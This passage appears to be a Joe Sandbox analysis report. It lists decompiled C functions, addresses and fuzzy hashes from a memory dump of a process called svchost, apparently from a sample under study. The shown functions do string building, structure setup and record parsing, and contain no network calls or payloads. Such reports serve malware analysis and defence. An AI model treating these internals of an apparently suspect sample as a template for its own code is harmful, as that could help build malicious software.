                                                                                                                                                                                                                                                                            0x04020a41
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020a3f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040209d6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020976
                                                                                                                                                                                                                                                                            0x04020b16
                                                                                                                                                                                                                                                                            0x04020b1a
                                                                                                                                                                                                                                                                            0x04020b20
                                                                                                                                                                                                                                                                            0x04020b26
                                                                                                                                                                                                                                                                            0x04020b26
                                                                                                                                                                                                                                                                            0x04020b30
                                                                                                                                                                                                                                                                            0x04020b3b
                                                                                                                                                                                                                                                                            0x04020b3e
                                                                                                                                                                                                                                                                            0x04020b41
                                                                                                                                                                                                                                                                            0x04020b48
                                                                                                                                                                                                                                                                            0x04020b59
                                                                                                                                                                                                                                                                            0x04020b4a
                                                                                                                                                                                                                                                                            0x04020b54
                                                                                                                                                                                                                                                                            0x04020b54
                                                                                                                                                                                                                                                                            0x04020b60
                                                                                                                                                                                                                                                                            0x04020b60
                                                                                                                                                                                                                                                                            0x04020b30
                                                                                                                                                                                                                                                                            0x04020b67
                                                                                                                                                                                                                                                                            0x04020b7f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memsetcodecvt
                                                                                                                                                                                                                                                                            • String ID: wwww
                                                                                                                                                                                                                                                                            • API String ID: 2800761558-671953474
                                                                                                                                                                                                                                                                            • Opcode ID: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                                            • Instruction ID: 61b96e00e12962727ee7777b3b76a6d85f6ef15ab9ff8b766a9639ba92e0cd34
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88813C74E00318EFEB24CFA4D985BEDBBB5AF48318F108159E605BB2D0D775AA81CB54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                                                                            • String ID: cE
                                                                                                                                                                                                                                                                            • API String ID: 2102423945-163553156
                                                                                                                                                                                                                                                                            • Opcode ID: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                                            • Instruction ID: fdc2fad14a78642c3e0d9cddc9ad9ddf1c8cf601b710c5b7852a6cc2ffa68677
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40718170E04238EAEF60CF91DA547BDB7F5AB01305F14819AE4897E1C4D7746A84DF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                                                                            			E04011930(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				void _v36;
                                                                                                                                                                                                                                                                            				signed short _v40;
                                                                                                                                                                                                                                                                            				signed short _v42;
                                                                                                                                                                                                                                                                            				signed short _v44;
                                                                                                                                                                                                                                                                            				signed short _v46;
                                                                                                                                                                                                                                                                            				signed short _v50;
                                                                                                                                                                                                                                                                            				signed short _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t56 = __ebx;
                                                                                                                                                                                                                                                                            				_v8 =  *0x429024 ^ _t77;
                                                                                                                                                                                                                                                                            				_v76 = __ecx;
                                                                                                                                                                                                                                                                            				_v56 = 0;
                                                                                                                                                                                                                                                                            				memcpy( &_v36, 0x427060, 6 << 2);
                                                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                                                            				_v64 = E04020CE0(0x29);
                                                                                                                                                                                                                                                                            				_v60 = _v64;
                                                                                                                                                                                                                                                                            				E04007010(0x42706c, _v60, 0, 0x29);
                                                                                                                                                                                                                                                                            				 *0x425180( &_v52);
                                                                                                                                                                                                                                                                            				 *0x4251f8(_v60, 0x28,  &_v36, _v52 & 0x0000ffff, _v50 & 0x0000ffff, _v46 & 0x0000ffff, _v44 & 0x0000ffff, _v42 & 0x0000ffff, _v40 & 0x0000ffff);
                                                                                                                                                                                                                                                                            				_v68 = E04020CE0(8);
                                                                                                                                                                                                                                                                            				if(_v68 == 0) {
                                                                                                                                                                                                                                                                            					_v80 = 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v80 = E0401F4E0(_v68);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t72 = _v80;
                                                                                                                                                                                                                                                                            				_v56 = _v80;
                                                                                                                                                                                                                                                                            				E0401FC90(_t56, _v56, 0x42706c, 0x427060, _v60, E040070A0(_v60));
                                                                                                                                                                                                                                                                            				if(_v60 != 0) {
                                                                                                                                                                                                                                                                            					_t72 = _v60;
                                                                                                                                                                                                                                                                            					_v72 = _v60;
                                                                                                                                                                                                                                                                            					E04020CC0(_v72);
                                                                                                                                                                                                                                                                            					_v60 = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return E04006C8C(_v56, _t56, _v8 ^ _t77, _t72, 0x42706c, 0x427060);
                                                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                                                            0x04011930
                                                                                                                                                                                                                                                                            0x0401193d
                                                                                                                                                                                                                                                                            0x04011942
                                                                                                                                                                                                                                                                            0x04011945
                                                                                                                                                                                                                                                                            0x04011959
                                                                                                                                                                                                                                                                            0x0401195b
                                                                                                                                                                                                                                                                            0x04011966
                                                                                                                                                                                                                                                                            0x0401196c
                                                                                                                                                                                                                                                                            0x04011977
                                                                                                                                                                                                                                                                            0x04011983
                                                                                                                                                                                                                                                                            0x040119b1
                                                                                                                                                                                                                                                                            0x040119c4
                                                                                                                                                                                                                                                                            0x040119cb
                                                                                                                                                                                                                                                                            0x040119da
                                                                                                                                                                                                                                                                            0x040119cd
                                                                                                                                                                                                                                                                            0x040119d5
                                                                                                                                                                                                                                                                            0x040119d5
                                                                                                                                                                                                                                                                            0x040119e1
                                                                                                                                                                                                                                                                            0x040119e4
                                                                                                                                                                                                                                                                            0x040119fb
                                                                                                                                                                                                                                                                            0x04011a04
                                                                                                                                                                                                                                                                            0x04011a06
                                                                                                                                                                                                                                                                            0x04011a09
                                                                                                                                                                                                                                                                            0x04011a10
                                                                                                                                                                                                                                                                            0x04011a18
                                                                                                                                                                                                                                                                            0x04011a18
                                                                                                                                                                                                                                                                            0x04011a31

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                                            • String ID: `pB
                                                                                                                                                                                                                                                                            • API String ID: 3713721629-8080248
                                                                                                                                                                                                                                                                            • Opcode ID: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                                            • Instruction ID: 23dbd6e54e78f367103934f2d22059264fab70093216257e69c110f1ce7c75f9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01313CB1D01218ABEB14EFD5E944AEEBBB5EF4C308F104029F505B7280E7756944CB61
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                                            			E04005630(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                                                            				E04007010(_t53, _v8, 0, 0x14);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x14)) =  *0x4250c0(0, 1, 0, 0, __ecx);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x1c)) = 0;
                                                                                                                                                                                                                                                                            				E04007010(_t53, _v8 + 0x20, 0, 8);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x28)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x2c)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x30)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x18)) = 0;
                                                                                                                                                                                                                                                                            				E04007010(_t53, _v8 + 0x38, 0, 0x10);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x4c)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x50)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x54)) = 0;
                                                                                                                                                                                                                                                                            				 *((char*)(_v8 + 0x58)) = 0;
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x04005634
                                                                                                                                                                                                                                                                            0x0400563f
                                                                                                                                                                                                                                                                            0x0400564a
                                                                                                                                                                                                                                                                            0x04005662
                                                                                                                                                                                                                                                                            0x04005668
                                                                                                                                                                                                                                                                            0x0400567a
                                                                                                                                                                                                                                                                            0x04005685
                                                                                                                                                                                                                                                                            0x0400568f
                                                                                                                                                                                                                                                                            0x04005699
                                                                                                                                                                                                                                                                            0x040056a3
                                                                                                                                                                                                                                                                            0x040056b5
                                                                                                                                                                                                                                                                            0x040056c0
                                                                                                                                                                                                                                                                            0x040056ca
                                                                                                                                                                                                                                                                            0x040056d4
                                                                                                                                                                                                                                                                            0x040056de
                                                                                                                                                                                                                                                                            0x040056e8
                                                                                                                                                                                                                                                                            0x040056f2

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                                                                            • String ID: wwww
                                                                                                                                                                                                                                                                            • API String ID: 2102423945-671953474
                                                                                                                                                                                                                                                                            • Opcode ID: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                                            • Instruction ID: 7ac7e521c84300ad453423b6d132e18307e481511a592d402c42c44ac5e64213
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56981159b78f17c5b562ff2e7d8da521ae3d0b0f004ad004817d56aaae5714f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21B874A40208EBEB54CF94D995B9EB7B1BB48708F204588E9046F3C1D7B6AF45EBC4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                                                            			E04020E40(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                                                                                                                            				signed int _t114;
                                                                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                                                            				signed int _t156;
                                                                                                                                                                                                                                                                            				signed int _t169;
                                                                                                                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                                                            				void* _t214;
                                                                                                                                                                                                                                                                            				void* _t215;
                                                                                                                                                                                                                                                                            				void* _t217;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t213 = __esi;
                                                                                                                                                                                                                                                                            				_t212 = __edi;
                                                                                                                                                                                                                                                                            				_t156 = __ecx;
                                                                                                                                                                                                                                                                            				_t155 = __ebx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					_t114 = E04021D10(_t156,  *0x42a2a8);
                                                                                                                                                                                                                                                                            					_t215 = _t214 + 4;
                                                                                                                                                                                                                                                                            					_v20 = _t114;
                                                                                                                                                                                                                                                                            					if((_v20 & 0x0000ffff) < 1 || (_v20 & 0x0000ffff) > 0x80c) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t119 = E04021D30(_t155, _t212, _t213, 0x42a2ac, _v20 & 0x0000ffff, 0x429fb0,  *0x429fac,  &_v12);
                                                                                                                                                                                                                                                                            					_t215 = _t215 + 0x14;
                                                                                                                                                                                                                                                                            					_v16 = _t119;
                                                                                                                                                                                                                                                                            					__eflags = _v16 - 5;
                                                                                                                                                                                                                                                                            					if(_v16 >= 5) {
                                                                                                                                                                                                                                                                            						__eflags = _v12;
                                                                                                                                                                                                                                                                            						if(_v12 != 0) {
                                                                                                                                                                                                                                                                            							_t122 = E040223A0(_v12 + 4, _v16 - 4);
                                                                                                                                                                                                                                                                            							_t215 = _t215 + 8;
                                                                                                                                                                                                                                                                            							_v36 = _t122;
                                                                                                                                                                                                                                                                            							__eflags = _v36 -  *_v12;
                                                                                                                                                                                                                                                                            							if(_v36 ==  *_v12) {
                                                                                                                                                                                                                                                                            								_t126 = E040070A0(_v12 + 0xc);
                                                                                                                                                                                                                                                                            								_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                            								_v40 = _t126;
                                                                                                                                                                                                                                                                            								__eflags = _v40 - 1;
                                                                                                                                                                                                                                                                            								if(_v40 >= 1) {
                                                                                                                                                                                                                                                                            									_v24 = _v40 + 0xd;
                                                                                                                                                                                                                                                                            									__eflags = _v12 + _v24;
                                                                                                                                                                                                                                                                            									_t127 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                                            									_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                            									_v44 = _t127;
                                                                                                                                                                                                                                                                            									_v32 = 0;
                                                                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                                                                            										__eflags = _v44;
                                                                                                                                                                                                                                                                            										if(_v44 <= 0) {
                                                                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            										_v24 = _v24 + _v44 + 1;
                                                                                                                                                                                                                                                                            										_t153 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                                            										_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                            										_v44 = _t153;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags = _v32 - 1;
                                                                                                                                                                                                                                                                            									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                            										_push( ~(0 | __eflags > 0x00000000) | _v32 * 0x00000004);
                                                                                                                                                                                                                                                                            										_t130 = E0400708A();
                                                                                                                                                                                                                                                                            										_t217 = _t215 + 4;
                                                                                                                                                                                                                                                                            										_v60 = _t130;
                                                                                                                                                                                                                                                                            										_v28 = _v60;
                                                                                                                                                                                                                                                                            										_v24 = _v40 + 0xd;
                                                                                                                                                                                                                                                                            										_v48 = 0;
                                                                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                                                                            											__eflags = _v48 - _v32;
                                                                                                                                                                                                                                                                            											if(_v48 >= _v32) {
                                                                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_v44 = E040070A0(_v12 + _v24);
                                                                                                                                                                                                                                                                            											_push(_v44 + 1);
                                                                                                                                                                                                                                                                            											_v64 = E0400708A();
                                                                                                                                                                                                                                                                            											_v52 = _v64;
                                                                                                                                                                                                                                                                            											_push(_v44);
                                                                                                                                                                                                                                                                            											E04006CA0(_t155, _t212, _t213, _v52, _v12 + _v24);
                                                                                                                                                                                                                                                                            											_t217 = _t217 + 0x14;
                                                                                                                                                                                                                                                                            											 *((char*)(_v52 + _v44)) = 0;
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v28 + _v48 * 4)) = _v52;
                                                                                                                                                                                                                                                                            											_v24 = _v24 + _v44 + 1;
                                                                                                                                                                                                                                                                            											_t209 = _v48 + 1;
                                                                                                                                                                                                                                                                            											__eflags = _t209;
                                                                                                                                                                                                                                                                            											_v48 = _t209;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_v68 = E04020CE0(0x14);
                                                                                                                                                                                                                                                                            										_v8 = _v68;
                                                                                                                                                                                                                                                                            										_t134 = _v8;
                                                                                                                                                                                                                                                                            										_t169 = _v12;
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t134 + 0xc)) =  *((intOrPtr*)(_t169 + 4));
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t134 + 0x10)) =  *((intOrPtr*)(_t169 + 8));
                                                                                                                                                                                                                                                                            										_push(_v40 + 1);
                                                                                                                                                                                                                                                                            										_v72 = E0400708A();
                                                                                                                                                                                                                                                                            										 *_v8 = _v72;
                                                                                                                                                                                                                                                                            										_push(_v40);
                                                                                                                                                                                                                                                                            										E04006CA0(_t155, _t212, _t213,  *_v8, _v12 + 0xc);
                                                                                                                                                                                                                                                                            										_t214 = _t217 + 0x14;
                                                                                                                                                                                                                                                                            										 *((char*)( *_v8 + _v40)) = 0;
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_v8 + 4)) = _v28;
                                                                                                                                                                                                                                                                            										 *(_v8 + 8) = _v32;
                                                                                                                                                                                                                                                                            										_t156 = 0;
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            										if(0 != 0) {
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								__eflags = _v12;
                                                                                                                                                                                                                                                                            								if(_v12 != 0) {
                                                                                                                                                                                                                                                                            									_v56 = _v12;
                                                                                                                                                                                                                                                                            									E04020CC0(_v56);
                                                                                                                                                                                                                                                                            									_t215 = _t215 + 4;
                                                                                                                                                                                                                                                                            									_v12 = 0x666;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L23:
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v76 = _v12;
                                                                                                                                                                                                                                                                            						E04020CC0(_v76);
                                                                                                                                                                                                                                                                            						_v12 = 0x666;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                                                            			}






































                                                                                                                                                                                                                                                                            0x04020e40
                                                                                                                                                                                                                                                                            0x04020e40
                                                                                                                                                                                                                                                                            0x04020e40
                                                                                                                                                                                                                                                                            0x04020e40
                                                                                                                                                                                                                                                                            0x04020e46
                                                                                                                                                                                                                                                                            0x04020e4d
                                                                                                                                                                                                                                                                            0x04020e54
                                                                                                                                                                                                                                                                            0x04020e5a
                                                                                                                                                                                                                                                                            0x04020e5f
                                                                                                                                                                                                                                                                            0x04020e62
                                                                                                                                                                                                                                                                            0x04020e6d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020e9a
                                                                                                                                                                                                                                                                            0x04020e9f
                                                                                                                                                                                                                                                                            0x04020ea2
                                                                                                                                                                                                                                                                            0x04020ea5
                                                                                                                                                                                                                                                                            0x04020ea9
                                                                                                                                                                                                                                                                            0x04020eab
                                                                                                                                                                                                                                                                            0x04020eaf
                                                                                                                                                                                                                                                                            0x04020ec4
                                                                                                                                                                                                                                                                            0x04020ec9
                                                                                                                                                                                                                                                                            0x04020ecc
                                                                                                                                                                                                                                                                            0x04020ed5
                                                                                                                                                                                                                                                                            0x04020ed7
                                                                                                                                                                                                                                                                            0x04020f04
                                                                                                                                                                                                                                                                            0x04020f09
                                                                                                                                                                                                                                                                            0x04020f0c
                                                                                                                                                                                                                                                                            0x04020f0f
                                                                                                                                                                                                                                                                            0x04020f13
                                                                                                                                                                                                                                                                            0x04020f20
                                                                                                                                                                                                                                                                            0x04020f26
                                                                                                                                                                                                                                                                            0x04020f2a
                                                                                                                                                                                                                                                                            0x04020f2f
                                                                                                                                                                                                                                                                            0x04020f32
                                                                                                                                                                                                                                                                            0x04020f35
                                                                                                                                                                                                                                                                            0x04020f3c
                                                                                                                                                                                                                                                                            0x04020f3c
                                                                                                                                                                                                                                                                            0x04020f40
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020f48
                                                                                                                                                                                                                                                                            0x04020f55
                                                                                                                                                                                                                                                                            0x04020f5f
                                                                                                                                                                                                                                                                            0x04020f64
                                                                                                                                                                                                                                                                            0x04020f67
                                                                                                                                                                                                                                                                            0x04020f67
                                                                                                                                                                                                                                                                            0x04020f6c
                                                                                                                                                                                                                                                                            0x04020f70
                                                                                                                                                                                                                                                                            0x04020f8a
                                                                                                                                                                                                                                                                            0x04020f8b
                                                                                                                                                                                                                                                                            0x04020f90
                                                                                                                                                                                                                                                                            0x04020f93
                                                                                                                                                                                                                                                                            0x04020f99
                                                                                                                                                                                                                                                                            0x04020fa2
                                                                                                                                                                                                                                                                            0x04020fa5
                                                                                                                                                                                                                                                                            0x04020fb7
                                                                                                                                                                                                                                                                            0x04020fba
                                                                                                                                                                                                                                                                            0x04020fbd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020fce
                                                                                                                                                                                                                                                                            0x04020fd7
                                                                                                                                                                                                                                                                            0x04020fe0
                                                                                                                                                                                                                                                                            0x04020fe6
                                                                                                                                                                                                                                                                            0x04020fec
                                                                                                                                                                                                                                                                            0x04020ff8
                                                                                                                                                                                                                                                                            0x04020ffd
                                                                                                                                                                                                                                                                            0x04021006
                                                                                                                                                                                                                                                                            0x04021012
                                                                                                                                                                                                                                                                            0x0402101f
                                                                                                                                                                                                                                                                            0x04020fb1
                                                                                                                                                                                                                                                                            0x04020fb1
                                                                                                                                                                                                                                                                            0x04020fb4
                                                                                                                                                                                                                                                                            0x04020fb4
                                                                                                                                                                                                                                                                            0x0402102e
                                                                                                                                                                                                                                                                            0x04021034
                                                                                                                                                                                                                                                                            0x04021037
                                                                                                                                                                                                                                                                            0x0402103a
                                                                                                                                                                                                                                                                            0x04021040
                                                                                                                                                                                                                                                                            0x04021046
                                                                                                                                                                                                                                                                            0x0402104f
                                                                                                                                                                                                                                                                            0x04021058
                                                                                                                                                                                                                                                                            0x04021061
                                                                                                                                                                                                                                                                            0x04021066
                                                                                                                                                                                                                                                                            0x04021074
                                                                                                                                                                                                                                                                            0x04021079
                                                                                                                                                                                                                                                                            0x04021084
                                                                                                                                                                                                                                                                            0x0402108e
                                                                                                                                                                                                                                                                            0x04021097
                                                                                                                                                                                                                                                                            0x0402109a
                                                                                                                                                                                                                                                                            0x0402109a
                                                                                                                                                                                                                                                                            0x0402109c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020f72
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020f15
                                                                                                                                                                                                                                                                            0x04020ed9
                                                                                                                                                                                                                                                                            0x04020ed9
                                                                                                                                                                                                                                                                            0x04020edd
                                                                                                                                                                                                                                                                            0x04020ee2
                                                                                                                                                                                                                                                                            0x04020ee9
                                                                                                                                                                                                                                                                            0x04020eee
                                                                                                                                                                                                                                                                            0x04020ef1
                                                                                                                                                                                                                                                                            0x04020ef1
                                                                                                                                                                                                                                                                            0x04020ef8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04020eaf
                                                                                                                                                                                                                                                                            0x040210a2
                                                                                                                                                                                                                                                                            0x040210a6
                                                                                                                                                                                                                                                                            0x040210ab
                                                                                                                                                                                                                                                                            0x040210b2
                                                                                                                                                                                                                                                                            0x040210ba
                                                                                                                                                                                                                                                                            0x040210ba
                                                                                                                                                                                                                                                                            0x040210c7
                                                                                                                                                                                                                                                                            0x040210c7
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
